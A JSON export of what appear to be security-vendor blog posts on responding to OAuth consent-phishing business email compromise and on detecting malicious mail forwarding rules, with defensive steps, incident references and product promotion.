access",{"url":76441,"width":76360,"height":76361},"https://images.ctfassets.net/y1cdw1ablpvd/7rb8P0FPOwF8aixOFD8Jjq/95e47270d9a401aabd5cd1814c6d6b75/diagram5.png",{"sys":76443,"__typename":1724,"title":76444,"caption":76445,"layoutMode":70327,"file":76446},{"id":67206},"OneDrive sharing","Abusing OneDrive document-sharing functionality",{"url":76447,"width":76448,"height":65579},"https://images.ctfassets.net/y1cdw1ablpvd/TULBVq6P3BvUxvuimJjpc/111332d799763e5e26aafa9655d8b841/image10.png",526,{"sys":76450,"__typename":1724,"title":76451,"caption":76452,"layoutMode":70327,"file":76453},{"id":67212},"OneDrive files","OneDrive files now shows shared status",{"url":76454,"width":76455,"height":76456},"https://images.ctfassets.net/y1cdw1ablpvd/5jcr8ep5Xg7vykfNmw6mhu/6c7b4e918882a01bbc10c824670cd4d7/image1.png",1024,474,{"items":76458},[],{},"How to maintain persistent access in a SaaS-native company",{"items":76462},[76463,76950],{"__typename":2059,"sys":76464,"content":76466,"title":76932,"synopsis":76933,"hashTags":59,"publishedDate":76934,"slug":76935,"tagsCollection":76936,"authorsCollection":76942},{"id":76465},"14NiRrBrLFVkR8h05RCD7F",{"json":76467},{"data":76468,"content":76469,"nodeType":856},{},[76470,76478,76486,76508,76516,76537,76544,76550,76557,76564,76571,76578,76585,76592,76599,76606,76613,76619,76626,76633,76640,76647,76667,76673,76680,76686,76693,76699,76706,76713,76720,76763,76770,76790,76797,76887,76907,76913,76920,76926],{"data":76471,"content":76472,"nodeType":860},{},[76473],{"data":76474,"marks":76475,"value":76477,"nodeType":864},{},[76476],{"type":2246},"You get a call from your CFO: “Jenkins! ACME just called to find out why we haven’t paid invoices for the last 3 months? Didn’t you make payment last week?”",{"data":76479,"content":76480,"nodeType":860},{},[76481],{"data":76482,"marks":76483,"value":76485,"nodeType":864},{},[76484],{"type":2246},"You think back a bit. “Yip! I received another invoice a few days ago and made payment yesterday. I also paid the contractor doing renovations on your house. By the way, congrats on the new kitchen.”",{"data":76487,"content":76488,"nodeType":860},{},[76489,76493,76504],{"data":76490,"marks":76491,"value":76492,"nodeType":864},{},[],"Many companies have had similar incidents occur over the last couple of years - it’s a classic ",{"data":76494,"content":76498,"nodeType":57700},{"target":76495},{"sys":76496},{"id":76497,"type":1001,"linkType":1002},"pj2eLZXa4PyrY1DD4NCHt",[76499],{"data":76500,"marks":76501,"value":76503,"nodeType":864},{},[76502],{"type":1455},"Business Email Compromise",{"data":76505,"marks":76506,"value":76507,"nodeType":864},{},[]," (BEC) scenario. An attacker managed to gain access to Jenkins in accounting’s email and intercepted email from legitimate creditors, replacing their banking details with the attacker's own, and even forging invoices from non-existent suppliers. Forged emails are then sent from the CEO or CFO to approve the payments.",{"data":76509,"content":76510,"nodeType":860},{},[76511],{"data":76512,"marks":76513,"value":76515,"nodeType":864},{},[76514],{"type":2246},"But how did they manage to gain access to the account? Our security team enforced multi-factor authentication (MFA) a few weeks ago. We’re supposed to be secure!?",{"data":76517,"content":76518,"nodeType":860},{},[76519,76523,76533],{"data":76520,"marks":76521,"value":76522,"nodeType":864},{},[],"As detailed in our ",{"data":76524,"content":76527,"nodeType":57700},{"target":76525},{"sys":76526},{"id":66969,"type":1001,"linkType":1002},[76528],{"data":76529,"marks":76530,"value":76532,"nodeType":864},{},[76531],{"type":1455},"blog post about consent phishing",{"data":76534,"marks":76535,"value":76536,"nodeType":864},{},[],", this attack method will bypass MFA, since the paired malicious third-party integration app (sometimes called OAuth) generates an authentication token. MFA checks are only applied when logging in with your username and password, so in this case, the attacker was able to get a valid access token into Jenkins’ account. ",{"data":76538,"content":76539,"nodeType":860},{},[76540],{"data":76541,"marks":76542,"value":76543,"nodeType":864},{},[],"While this isn’t necessarily the same level of access provided with a username/password combo, it might be, based on the scopes Jenkins granted the third-party integration app access to when they clicked ‘Accept’. ",{"data":76545,"content":76549,"nodeType":996},{"target":76546},{"sys":76547},{"id":76548,"type":1001,"linkType":1002},"5BIHqq49jJOHsEHLgc8Tb9",[],{"data":76551,"content":76552,"nodeType":860},{},[76553],{"data":76554,"marks":76555,"value":76556,"nodeType":864},{},[],"The list of third-party integration scopes can include anything from relatively benign things like retrieving your name, surname, and email address, to more dangerous or excessive permissions such as full access to your mailbox, the ability to configure mail rules to forward or delete email, and full access to your OneDrive or Sharepoint files. Worse case scenario: if you belong to groups with password reset capabilities, the attacker may be able to perform full account takeovers.",{"data":76558,"content":76559,"nodeType":1312},{},[76560],{"data":76561,"marks":76562,"value":76563,"nodeType":864},{},[],"How do you detect and respond to such incidents?",{"data":76565,"content":76566,"nodeType":860},{},[76567],{"data":76568,"marks":76569,"value":76570,"nodeType":864},{},[],"The main issue is detection. In my experience as an incident responder working with Fortune 500 companies at MWR Infosecurity, I found that BEC attacks are usually detected when associated parties start asking questions about non-payment (or unrecognized payments), which can take weeks or months from the day of compromise. By this point your cloud provider’s logs are likely to have rolled over and you’re unlikely to find much useful information to populate your incident timeline.",{"data":76572,"content":76573,"nodeType":860},{},[76574],{"data":76575,"marks":76576,"value":76577,"nodeType":864},{},[],"Shameless plug alert: Push’s ChatOps functionality can greatly assist here as it detects such malicious rules when created, and sends a message to the owner of the account (Jenkins) asking if they created the rule. Sometimes a user will have a legitimate use for creating mail rules to forward messages to another account, and this allows them to acknowledge the rule and mark it as safe. In case they didn’t create it, they can flag it as such and this will cause an alert to be sent to their security team. This is practically instant detection and invaluable when preventing fraudulent payments. And getting input from the account owner cuts way down on alert fatigue for your team.",{"data":76579,"content":76580,"nodeType":1312},{},[76581],{"data":76582,"marks":76583,"value":76584,"nodeType":864},{},[],"\nMitigate the attack \n",{"data":76586,"content":76587,"nodeType":860},{},[76588],{"data":76589,"marks":76590,"value":76591,"nodeType":864},{},[],"Once you’ve detected the incident, your next step is to remediate. Typically, this would require someone on the  security team to find the offending rule in your cloud provider’s control panel to disable it, which can take some time, depending on the team’s availability and other factors. ",{"data":76593,"content":76594,"nodeType":860},{},[76595],{"data":76596,"marks":76597,"value":76598,"nodeType":864},{},[],"Detecting the creation of malicious mail rules would require you to configure policies and alerts in your cloud provider’s control panel, and requires someone from the security team to monitor for notifications. If your IT person is also responsible for security in your organization, it’s unlikely that they would spend an appropriate amount of time looking at alerts and, in many cases, would need to follow up with employees to confirm if they had indeed created the rules. If you’re a larger organization, your dedicated security person will likely have higher priority tasks, too.",{"data":76600,"content":76601,"nodeType":860},{},[76602],{"data":76603,"marks":76604,"value":76605,"nodeType":864},{},[],"Discovering a breach is usually related to someone noticing unrecognized payments, vendors querying a lack of payments, or phishing emails being sent to fellow employees or contacts outside of your organization. If an attacker is careful to avoid causing too much interruption, then it’s likely that you won’t discover the breach until all the damage has been done. Usually by this point, performing an investigation will reveal very little due to important investigation artifacts disappearing due to logs rolling over.",{"data":76607,"content":76608,"nodeType":860},{},[76609],{"data":76610,"marks":76611,"value":76612,"nodeType":864},{},[],"If you’re using Push, we would automatically detect the mail rule, talk to the employee whose email the mail rule was created within, and if they didn’t set the mail rule up themselves, we would assume it was created by an attacker and alert your security team. Push’s ChatOps will disable the offending rule and mark it as suspicious.",{"data":76614,"content":76618,"nodeType":996},{"target":76615},{"sys":76616},{"id":76617,"type":1001,"linkType":1002},"6rV4EiwTgmBsmYEaUvv55b",[],{"data":76620,"content":76621,"nodeType":860},{},[76622],{"data":76623,"marks":76624,"value":76625,"nodeType":864},{},[],"If this were a typical credential compromise scenario, the account’s password would be reset and everyone would go about their lives. However, since no credentials were compromised in our example, you’d go onto the next step to…",{"data":76627,"content":76628,"nodeType":1312},{},[76629],{"data":76630,"marks":76631,"value":76632,"nodeType":864},{},[],"Remove the app’s permissions and revoke the tokens",{"data":76634,"content":76635,"nodeType":860},{},[76636],{"data":76637,"marks":76638,"value":76639,"nodeType":864},{},[],"As I mentioned earlier, third-party integration apps generate tokens, which can be valid for an hour to sometimes 24 hours or more, depending on the integrating app, how it is being used, and if it makes use of refresh tokens.",{"data":76641,"content":76642,"nodeType":860},{},[76643],{"data":76644,"marks":76645,"value":76646,"nodeType":864},{},[],"Invalidating third-party integration access permissions requires accessing your cloud provider’s control panel. In this example, you need to revoke access for a malicious app in a Microsoft 365 tenant. Microsoft’s guidance on this is very useful, but unfortunately not as simple as just pressing a button.",{"data":76648,"content":76649,"nodeType":860},{},[76650,76654,76663],{"data":76651,"marks":76652,"value":76653,"nodeType":864},{},[],"To view Microsoft’s recommendations for dealing with a malicious app, you’d need to navigate to the ",{"data":76655,"content":76657,"nodeType":883},{"uri":76656},"https://portal.azure.com/#view/Microsoft_AAD_IAM/StartboardApplicationsMenuBlade/~/AppAppsPreview/menuId~/null",[76658],{"data":76659,"marks":76660,"value":76662,"nodeType":864},{},[76661],{"type":1455},"Enterprise applications",{"data":76664,"marks":76665,"value":76666,"nodeType":864},{},[]," section in Azure, and locate the app by searching for its name or Application ID, which can be found in the Push app’s OAuth integrations page. In the app menu, click on ‘Permissions,’ then ‘Review permissions.’ ",{"data":76668,"content":76672,"nodeType":996},{"target":76669},{"sys":76670},{"id":76671,"type":1001,"linkType":1002},"5Z6T2anRIJ1he2phTbcFot",[],{"data":76674,"content":76675,"nodeType":860},{},[76676],{"data":76677,"marks":76678,"value":76679,"nodeType":864},{},[],"On the slide-out menu, select “This application is malicious and I’m compromised.”",{"data":76681,"content":76685,"nodeType":996},{"target":76682},{"sys":76683},{"id":76684,"type":1001,"linkType":1002},"2lGnKdKTjXAVYBiOtYrbEl",[],{"data":76687,"content":76688,"nodeType":860},{},[76689],{"data":76690,"marks":76691,"value":76692,"nodeType":864},{},[],"This will provide you with pre-generated PowerShell scripts to 1) Remove all users assigned to the application, 2) Revoke all permissions granted to the application, and 3) Revoke refresh tokens for all users.",{"data":76694,"content":76698,"nodeType":996},{"target":76695},{"sys":76696},{"id":76697,"type":1001,"linkType":1002},"3qdGQ12PdZFLEyIpmMkwPi",[],{"data":76700,"content":76701,"nodeType":1312},{},[76702],{"data":76703,"marks":76704,"value":76705,"nodeType":864},{},[],"How to prevent similar attacks",{"data":76707,"content":76708,"nodeType":860},{},[76709],{"data":76710,"marks":76711,"value":76712,"nodeType":864},{},[],"A very important step following a compromise is to review what happened, how it happened, and what could be done to prevent the incident from occurring again. The interesting part about this incident is that it wasn’t due to a weak password, or even the lack of MFA that led to compromise. It came down to social engineering: instructing an employee to click a link by an account masquerading as their CFO.",{"data":76714,"content":76715,"nodeType":860},{},[76716],{"data":76717,"marks":76718,"value":76719,"nodeType":864},{},[],"For the purposes of this hypothetical incident, we’ll establish that the following occurred:",{"data":76721,"content":76722,"nodeType":941},{},[76723,76733,76743,76753],{"data":76724,"content":76725,"nodeType":945},{},[76726],{"data":76727,"content":76728,"nodeType":860},{},[76729],{"data":76730,"marks":76731,"value":76732,"nodeType":864},{},[],"Andrew Jenkins was targeted in a phishing attack",{"data":76734,"content":76735,"nodeType":945},{},[76736],{"data":76737,"content":76738,"nodeType":860},{},[76739],{"data":76740,"marks":76741,"value":76742,"nodeType":864},{},[],"Andrew authenticated via Microsoft 365, which is a legitimate and expected authentication mechanism and occurs almost daily",{"data":76744,"content":76745,"nodeType":945},{},[76746],{"data":76747,"content":76748,"nodeType":860},{},[76749],{"data":76750,"marks":76751,"value":76752,"nodeType":864},{},[],"No attachments were downloaded, thus in this isolated incident there was no code execution on Andrew’s host, meaning that Anti-Virus or Endpoint Detection & Response (EDR) would not have prevented it",{"data":76754,"content":76755,"nodeType":945},{},[76756],{"data":76757,"content":76758,"nodeType":860},{},[76759],{"data":76760,"marks":76761,"value":76762,"nodeType":864},{},[],"The attacker gained full access to Andrew’s mailbox",{"data":76764,"content":76765,"nodeType":860},{},[76766],{"data":76767,"marks":76768,"value":76769,"nodeType":864},{},[],"The malicious app was disabled by Microsoft after some time, so a full investigation into its capabilities was not possible. We don’t know whether another phishing page was presented after the integration took place, thus to be on the safe side we need to assume this happened and led to credential compromise.",{"data":76771,"content":76772,"nodeType":860},{},[76773,76777,76786],{"data":76774,"marks":76775,"value":76776,"nodeType":864},{},[],"The app was unverified, which has historically been true in most of these scenarios. Publishers need to associate a Microsoft Partner Network (MPN) ID with the app, which follows a ",{"data":76778,"content":76780,"nodeType":883},{"uri":76779},"https://docs.microsoft.com/en-us/partner-center/verification-responses",[76781],{"data":76782,"marks":76783,"value":76785,"nodeType":864},{},[76784],{"type":1455},"verification process",{"data":76787,"marks":76788,"value":76789,"nodeType":864},{},[],", in order to have it appear as a verified app. This Microsoft 365 tenant was configured to allow unverified integrations due to an oversight following an app migration project.",{"data":76791,"content":76792,"nodeType":860},{},[76793],{"data":76794,"marks":76795,"value":76796,"nodeType":864},{},[],"This leads us to the following to help prevent similar attacks from occurring in future, and to make sure there is no opportunity for the attacker to leverage any existing foothold:",{"data":76798,"content":76799,"nodeType":941},{},[76800,76810,76820,76830,76851,76867,76877],{"data":76801,"content":76802,"nodeType":945},{},[76803],{"data":76804,"content":76805,"nodeType":860},{},[76806],{"data":76807,"marks":76808,"value":76809,"nodeType":864},{},[],"Disable the integration and remove the malicious app’s permissions",{"data":76811,"content":76812,"nodeType":945},{},[76813],{"data":76814,"content":76815,"nodeType":860},{},[76816],{"data":76817,"marks":76818,"value":76819,"nodeType":864},{},[],"Reset Andrew Jenkins’ credentials",{"data":76821,"content":76822,"nodeType":945},{},[76823],{"data":76824,"content":76825,"nodeType":860},{},[76826],{"data":76827,"marks":76828,"value":76829,"nodeType":864},{},[],"Be aware of and review newly created mail rules",{"data":76831,"content":76832,"nodeType":945},{},[76833],{"data":76834,"content":76835,"nodeType":860},{},[76836,76839,76848],{"data":76837,"marks":76838,"value":21,"nodeType":864},{},[],{"data":76840,"content":76842,"nodeType":883},{"uri":76841},"https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/configure-user-consent?tabs=azure-portal",[76843],{"data":76844,"marks":76845,"value":76847,"nodeType":864},{},[76846],{"type":1455},"Confirm that the Microsoft 365 tenant is set to disallow integrations from unverified apps",{"data":76849,"marks":76850,"value":21,"nodeType":864},{},[],{"data":76852,"content":76853,"nodeType":945},{},[76854],{"data":76855,"content":76856,"nodeType":941},{},[76857],{"data":76858,"content":76859,"nodeType":945},{},[76860],{"data":76861,"content":76862,"nodeType":860},{},[76863],{"data":76864,"marks":76865,"value":76866,"nodeType":864},{},[],"Note: as of November 9th, 2020, integrations with unverified apps are disabled by default.",{"data":76868,"content":76869,"nodeType":945},{},[76870],{"data":76871,"content":76872,"nodeType":860},{},[76873],{"data":76874,"marks":76875,"value":76876,"nodeType":864},{},[],"Communicate with employees and other affected parties to be weary of these types of attacks",{"data":76878,"content":76879,"nodeType":945},{},[76880],{"data":76881,"content":76882,"nodeType":860},{},[76883],{"data":76884,"marks":76885,"value":76886,"nodeType":864},{},[],"Perform regular audits against your Microsoft 365 tenants to highlight any discrepancies and integrations with unusual or unnecessary permissions.",{"data":76888,"content":76889,"nodeType":860},{},[76890,76894,76903],{"data":76891,"marks":76892,"value":76893,"nodeType":864},{},[],"Microsoft implementing safe defaults towards limiting integrations from unverified publishers was a step in the right direction. However, there have been ",{"data":76895,"content":76897,"nodeType":883},{"uri":76896},"https://www.proofpoint.com/us/blog/cloud-security/oivavoii-active-malicious-hybrid-cloud-threats-campaign",[76898],{"data":76899,"marks":76900,"value":76902,"nodeType":864},{},[76901],{"type":1455},"cases",{"data":76904,"marks":76905,"value":76906,"nodeType":864},{},[]," where attackers utilized compromised publishers to perform similar attacks. ",{"data":76908,"content":76909,"nodeType":1312},{},[76910],{"data":76911,"marks":76912,"value":24968,"nodeType":864},{},[],{"data":76914,"content":76915,"nodeType":860},{},[76916],{"data":76917,"marks":76918,"value":76919,"nodeType":864},{},[],"While the process isn’t exactly straightforward, catching early indicators like malicious mail rules helps you prevent an attacker from launching additional attacks like phishing campaigns as they try to gain access to sensitive business data. Removing the mail rule is just the start of the process, you really need to revoke permissions and take the other steps we covered in this post to stop an attack from going any further. We’ll publish some more content on SaaS incident response on our blog, so subscribe to get our guidance straight into your inbox.",{"data":76921,"content":76925,"nodeType":996},{"target":76922},{"sys":76923},{"id":76924,"type":1001,"linkType":1002},"6oHRbGLus4bstsAc7E0zBD",[],{"data":76927,"content":76928,"nodeType":860},{},[76929],{"data":76930,"marks":76931,"value":21,"nodeType":864},{},[],"How to kick off an incident response investigation for a compromised SaaS account","We'll walk through how to quickly detect and mitigate business email compromise (BEC) and then prevent future attacks.","2022-09-20T00:00:00.000Z","how-to-kick-off-an-incident-response-investigation-for-a-compromised-saas",{"items":76937},[76938,76940],{"sys":76939,"name":342},{"id":6596},{"sys":76941,"name":297},{"id":2732},{"items":76943},[76944],{"fullName":76945,"firstName":76946,"jobTitle":76947,"profilePicture":76948},"Johann Scheepers","Johann","Senior Security Engineer",{"url":76949},"https://images.ctfassets.net/y1cdw1ablpvd/75IEOH93vR0hbvxuqTu1m3/f6222745ee6892ea07bc18727a5a5ae7/T016S22KZ96-U02LU3SKC2D-e1e755770536-512.png",{"__typename":2059,"sys":76951,"content":76952,"title":76342,"synopsis":77292,"hashTags":77293,"publishedDate":77299,"slug":76343,"tagsCollection":77300,"authorsCollection":77306},{"id":66917},{"json":76953},{"data":76954,"content":76955,"nodeType":856},{},[76956,76963,76969,76976,76995,77023,77030,77113,77132,77135,77142,77160,77167,77174,77177,77184,77229,77236,77253,77260,77263,77270,77276],{"data":76957,"content":76958,"nodeType":860},{},[76959],{"data":76960,"marks":76961,"value":76962,"nodeType":864},{},[],"Mail rules are a handy feature found in most email clients. You might have used them to forward emails to your teammates while you’re off sipping Piña coladas, or to move incoming email from that spammy colleague to the ‘don’t read’ folder.",{"data":76964,"content":76968,"nodeType":996},{"target":76965},{"sys":76966},{"id":76967,"type":1001,"linkType":1002},"7xLVXoCCjansV1u50e2pbM",[],{"data":76970,"content":76971,"nodeType":860},{},[76972],{"data":76973,"marks":76974,"value":76975,"nodeType":864},{},[],"Sadly for us defenders, they’re just as useful for attackers. After gaining access to a victim's account, attackers will often create a mail rule inside their mailbox as a way to maintain stealthy access. This mail rule can do anything a normal mail rule could but is usually used to forward emails matching sensitive keywords, like ‘invoice’ or ‘payment’, to an external email address controlled by the attacker.",{"data":76977,"content":76978,"nodeType":1116},{},[76979],{"data":76980,"content":76981,"nodeType":860},{},[76982,76986,76991],{"data":76983,"marks":76984,"value":76985,"nodeType":864},{},[],"This gives the ",{"data":76987,"marks":76988,"value":76990,"nodeType":864},{},[76989],{"type":899},"attacker persistent access to the mailbox",{"data":76992,"marks":76993,"value":76994,"nodeType":864},{},[],". Even if the victim's password is changed, they turn on MFA, or their workstation is completely rebuilt - as long as the rule stays in place, it remains effective.",{"data":76996,"content":76997,"nodeType":860},{},[76998,77002,77010,77014,77019],{"data":76999,"marks":77000,"value":77001,"nodeType":864},{},[],"As another example, in ",{"data":77003,"content":77005,"nodeType":883},{"uri":77004},"https://www.reddit.com/r/sysadmin/comments/6l63x6/malicious_outlook_rules/",[77006],{"data":77007,"marks":77008,"value":22435,"nodeType":864},{},[77009],{"type":1455},{"data":77011,"marks":77012,"value":77013,"nodeType":864},{},[]," the author describes how mail rules were used to ",{"data":77015,"marks":77016,"value":77018,"nodeType":864},{},[77017],{"type":2246},"delete ",{"data":77020,"marks":77021,"value":77022,"nodeType":864},{},[],"any emails the affected user received from the company’s Chief Finance Officer (CFO) so that the attacker could pretend to be the CFO, sending them fake emails to convince them to transfer out company funds.",{"data":77024,"content":77025,"nodeType":860},{},[77026],{"data":77027,"marks":77028,"value":77029,"nodeType":864},{},[],"Business Email Compromise (BEC) like this is the most popular type of attack at the moment, causing damages well into the billions according to the FBI. Here are just a few publicly documented breaches involving mail rules:",{"data":77031,"content":77032,"nodeType":941},{},[77033,77053,77073,77093],{"data":77034,"content":77035,"nodeType":945},{},[77036],{"data":77037,"content":77038,"nodeType":860},{},[77039,77042,77050],{"data":77040,"marks":77041,"value":21,"nodeType":864},{},[],{"data":77043,"content":77045,"nodeType":883},{"uri":77044},"https://www.sans.org/dataincident2020",[77046],{"data":77047,"marks":77048,"value":77049,"nodeType":864},{},[],"SANS: 28,000 PII records lost",{"data":77051,"marks":77052,"value":21,"nodeType":864},{},[],{"data":77054,"content":77055,"nodeType":945},{},[77056],{"data":77057,"content":77058,"nodeType":860},{},[77059,77062,77070],{"data":77060,"marks":77061,"value":21,"nodeType":864},{},[],{"data":77063,"content":77065,"nodeType":883},{"uri":77064},"https://www.ic3.gov/Media/News/2020/201204.pdf",[77066],{"data":77067,"marks":77068,"value":77069,"nodeType":864},{},[],"FBI report: BEC involving malicious mail rules costs company $175k",{"data":77071,"marks":77072,"value":21,"nodeType":864},{},[],{"data":77074,"content":77075,"nodeType":945},{},[77076],{"data":77077,"content":77078,"nodeType":860},{},[77079,77082,77090],{"data":77080,"marks":77081,"value":21,"nodeType":864},{},[],{"data":77083,"content":77085,"nodeType":883},{"uri":77084},"https://www.reddit.com/r/Office365/comments/ej0wkx/hacker_created_forwarding_rules_for_users_account/",[77086],{"data":77087,"marks":77088,"value":77089,"nodeType":864},{},[],"Reddit thread: Hacker created forwarding rule for user's account",{"data":77091,"marks":77092,"value":14717,"nodeType":864},{},[],{"data":77094,"content":77095,"nodeType":945},{},[77096],{"data":77097,"content":77098,"nodeType":860},{},[77099,77102,77110],{"data":77100,"marks":77101,"value":21,"nodeType":864},{},[],{"data":77103,"content":77105,"nodeType":883},{"uri":77104},"https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/",[77106],{"data":77107,"marks":77108,"value":77109,"nodeType":864},{},[],"Microsoft case study of BEC operation using mail rules",{"data":77111,"marks":77112,"value":21,"nodeType":864},{},[],{"data":77114,"content":77115,"nodeType":860},{},[77116,77120,77128],{"data":77117,"marks":77118,"value":77119,"nodeType":864},{},[],"You can read ",{"data":77121,"content":77123,"nodeType":883},{"uri":77122},"/blog/case-study-business-email-compromise-bec-attack-nearly-cost-us-millions/",[77124],{"data":77125,"marks":77126,"value":77127,"nodeType":864},{},[],"this case study",{"data":77129,"marks":77130,"value":77131,"nodeType":864},{},[]," of a how a real Business Email Compromise (BEC) attack played out at an engineering firm that we interviewed.",{"data":77133,"content":77134,"nodeType":1005},{},[],{"data":77136,"content":77137,"nodeType":1009},{},[77138],{"data":77139,"marks":77140,"value":77141,"nodeType":864},{},[],"How likely is this to actually happen?",{"data":77143,"content":77144,"nodeType":860},{},[77145,77148,77156],{"data":77146,"marks":77147,"value":21,"nodeType":864},{},[],{"data":77149,"content":77151,"nodeType":883},{"uri":77150},"https://attack.mitre.org/techniques/T1114/003/",[77152],{"data":77153,"marks":77154,"value":77155,"nodeType":864},{},[],"MITRE lists threat groups",{"data":77157,"marks":77158,"value":77159,"nodeType":864},{},[]," that have been known to use mail rules in this way as part of targeted attacks. However, most often, this technique is used opportunistically.",{"data":77161,"content":77162,"nodeType":860},{},[77163],{"data":77164,"marks":77165,"value":77166,"nodeType":864},{},[],"Attackers run phishing campaigns containing thousands of harvested emails from multiple companies. A classic scenario is to trick a user into logging in to a fake Office 365 or Google Workspace login screen, stealing their credentials. Those credentials are then used to create a malicious mail rule inside the compromised user's mailbox. For scale and speed, this process is completely automated.",{"data":77168,"content":77169,"nodeType":860},{},[77170],{"data":77171,"marks":77172,"value":77173,"nodeType":864},{},[],"Similarly a mail rule could be created automatically as the result of a user’s workstation becoming infected with malware.",{"data":77175,"content":77176,"nodeType":1005},{},[],{"data":77178,"content":77179,"nodeType":1009},{},[77180],{"data":77181,"marks":77182,"value":77183,"nodeType":864},{},[],"How to defend against this type of attack?",{"data":77185,"content":77186,"nodeType":860},{},[77187,77191,77199,77203,77213,77216,77226],{"data":77188,"marks":77189,"value":77190,"nodeType":864},{},[],"The first step is to check your mailboxes to make sure no malicious mail rules have already been created. On Office 365, this will require rolling some PowerShell; on Google Workspace, you'll need to query the APIs (we discuss some detail of these options ",{"data":77192,"content":77194,"nodeType":883},{"uri":77193},"/blog/should-you-disable-external-email-auto-forwarding/",[77195],{"data":77196,"marks":77197,"value":77198,"nodeType":864},{},[],"in this post",{"data":77200,"marks":77201,"value":77202,"nodeType":864},{},[],"). Or you can save yourself some pain and use the free tool linked above, which we built for this very purpose. If you find rules that don't look right, follow these guides for what to do next on ",{"data":77204,"content":77208,"nodeType":57700},{"target":77205},{"sys":77206},{"id":77207,"type":1001,"linkType":1002},"e4805bba-2531-4250-bdcc-ab996dd33519",[77209],{"data":77210,"marks":77211,"value":77212,"nodeType":864},{},[],"Office 365",{"data":77214,"marks":77215,"value":19754,"nodeType":864},{},[],{"data":77217,"content":77221,"nodeType":57700},{"target":77218},{"sys":77219},{"id":77220,"type":1001,"linkType":1002},"50dab356-e78b-479d-ad45-a07b898b5ec4",[77222],{"data":77223,"marks":77224,"value":77225,"nodeType":864},{},[],"Google Workspace",{"data":77227,"marks":77228,"value":2924,"nodeType":864},{},[],{"data":77230,"content":77231,"nodeType":860},{},[77232],{"data":77233,"marks":77234,"value":77235,"nodeType":864},{},[],"It's also possible to stop users from creating auto-forwarding rules altogether. If no one is using the feature, this is probably a good idea - you might as well reduce risk. However, there are plenty of situations where teams benefit from the automation and efficiency mail rules bring. Security works best when it enables the business to work securely, rather than constraining it - leaving the feature available whilst managing the risk through detection is a good option as well.",{"data":77237,"content":77238,"nodeType":860},{},[77239,77243,77250],{"data":77240,"marks":77241,"value":77242,"nodeType":864},{},[],"We discuss more about the pros and cons of disabling mail rules and some options for some security controls you can implement so that you can keep them enabled ",{"data":77244,"content":77245,"nodeType":883},{"uri":77193},[77246],{"data":77247,"marks":77248,"value":77249,"nodeType":864},{},[],"in this blog post",{"data":77251,"marks":77252,"value":2924,"nodeType":864},{},[],{"data":77254,"content":77255,"nodeType":860},{},[77256],{"data":77257,"marks":77258,"value":77259,"nodeType":864},{},[],"If you'd like, try Push for free and we'll spot any suspicious mail rules, then work with employees to make sure the mail rule wasn't something they created for a legitimate use. If they haven't, we'll notify you to take action and investigate a potential incident. Find out more here.",{"data":77261,"content":77262,"nodeType":1005},{},[],{"data":77264,"content":77265,"nodeType":1009},{},[77266],{"data":77267,"marks":77268,"value":23798,"nodeType":864},{},[77269],{"type":899},{"data":77271,"content":77272,"nodeType":860},{},[77273],{"data":77274,"marks":77275,"value":40338,"nodeType":864},{},[],{"data":77277,"content":77278,"nodeType":860},{},[77279,77282,77289],{"data":77280,"marks":77281,"value":40953,"nodeType":864},{},[],{"data":77283,"content":77285,"nodeType":883},{"uri":77284},"https://pushsecurity.com/demo?utm_campaign=12081956-FY25Q2_Hacker-News-Article&utm_source=thehackernews&utm_medium=sponsored&utm_content=external-article",[77286],{"data":77287,"marks":77288,"value":10299,"nodeType":864},{},[],{"data":77290,"marks":77291,"value":2924,"nodeType":864},{},[],"After phishing campaigns target Office 365 and Google Workspace users, malicious mail rules are automatically added to the user’s mailbox. Take steps to defend.",[77294,271,77295,77296,77297,77298],"businessemailcompromise","mailrules","office365","googleworkspace","emailsecurity","2021-06-10T00:00:00.000+01:00",{"items":77301},[77302,77304],{"sys":77303,"name":6593},{"id":6592},{"sys":77305,"name":342},{"id":6596},{"items":77307},[77308],{"fullName":75554,"firstName":75555,"jobTitle":75556,"profilePicture":77309},{"url":75558},"blog/maintaining-persistent-access-in-a-saas-first-world",{"json":77312},{"data":77313,"content":77314,"nodeType":856},{},[77315],{"data":77316,"content":77317,"nodeType":860},{},[77318],{"data":77319,"marks":77320,"value":77321,"nodeType":864},{},[],"In this post, we’ll explore new methods for attackers to maintain persistence in the cloud",{"id":62145,"publishedAt":77323},"2026-08-12T11:56:35.761Z",{"items":77325},[77326],{"sys":77327,"name":6593},{"id":6592},{"items":77329},[77330,77332,77334,77336,77338,77340,77342],{"sys":77331,"name":545,"slug":546,"tier":31},{"id":542},{"sys":77333,"name":413,"slug":414,"tier":31},{"id":410},{"sys":77335,"name":642,"slug":643,"tier":31},{"id":639},{"sys":77337,"name":484,"slug":485,"tier":45},{"id":481},{"sys":77339,"name":571,"slug":572,"tier":45},{"id":568},{"sys":77341,"name":633,"slug":634,"tier":45},{"id":630},{"sys":77343,"name":431,"slug":432,"tier":45},{"id":428},"MHtPxZhzJdsKP4eytp-Wpmf3dRAN4vLNYJFbpZ0OKh0",1787040076990]